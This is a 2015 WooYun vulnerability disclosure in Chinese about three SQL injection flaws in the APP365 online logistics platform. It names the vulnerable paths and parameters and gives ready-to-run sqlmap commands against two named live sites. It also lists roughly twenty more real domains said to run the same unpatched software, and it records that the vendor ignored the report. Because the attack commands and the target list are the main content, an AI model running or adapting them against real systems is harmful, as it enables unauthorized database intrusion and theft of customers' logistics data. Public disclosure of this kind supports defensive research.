当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103386

漏洞标题:某通用在线物流管理平台3处SQL注入打包

相关厂商:APP365

漏洞作者: 路人甲

提交时间:2015-03-24 17:00

修复时间:2015-05-08 17:02

公开时间:2015-05-08 17:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

APP365在线物流管理平台3处SQL注入打包
官网:http://www.app365.com/
客户案例:http://www.app365.com/common/customer.jhtml
百度搜索:友情链接: APP365 在线物流软件

0.png

第一处:
注入链接: /Station/province.jspx?province_id=
注入参数: province_id
第二处:
注入链接: /Station/stationList.jspx?city_name=
注入参数: city_name
第三处:
注入链接: /LmsOrder/trackOrder.jspx?order_no=
注入参数: order_no

漏洞证明:

测试案例:
0x01
(1)http://awind.app365.com/

1.PNG


sqlmap注入:
python sqlmap.py -u http://awind.app365.com/site56/Station/province.jspx?province_id=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db

2.PNG


(2)http://www.56yt.com/

3.PNG


sqlmap注入:
python sqlmap.py -u http://www.56yt.com/site56/Station/province.jspx?province_id=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db

4.png


0x02
(1)http://awind.app365.com/
sqlmap注入:
python sqlmap.py -u http://awind.app365.com/site56/Station/stationList.jspx?city_name=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db

6.PNG


(2)http://www.56yt.com/
sqlmap注入:
python sqlmap.py -u http://www.56yt.com/site56/Station/stationList.jspx?city_name=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db

8.png


0x03
(1)http://awind.app365.com/
sqlmap注入:
python sqlmap.py -u http://awind.app365.com/site56/LmsOrder/trackOrder.jspx?order_no=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db

10.png


(2)http://www.56yt.com/
sqlmap注入:
python sqlmap.py -u http://www.56yt.com/site56/LmsOrder/trackOrder.jspx?order_no=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db

12.png


其他案例:
http://www.szjdt56.cn/
http://www.meiluen.com.cn/
http://www.hal.net.cn/
http://awind.app365.com/
http://www.hacc56.com/
http://www.gexll.com/
http://www.szjdt56.cn/
http://www.hacc56.com/
http://www.wistron.cc/
http://www.sxts.cn/
http://www.sinojt.com/
http://www.56yt.com/
http://www.shdushi56.com/
http://10086.app365.com/
http://ezshop.app365.com/
http://jdwl.wuy56.com/
http://bfyd56.joyogy.com/
http://jxwy56.joyogy.com/
http://mqzt56.app365.com/
http://www.gexll.com/
http://www.bjjbwl.cn/
http://www.xbwl.joyogy.com/
http://krd56.joyogy.com/

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝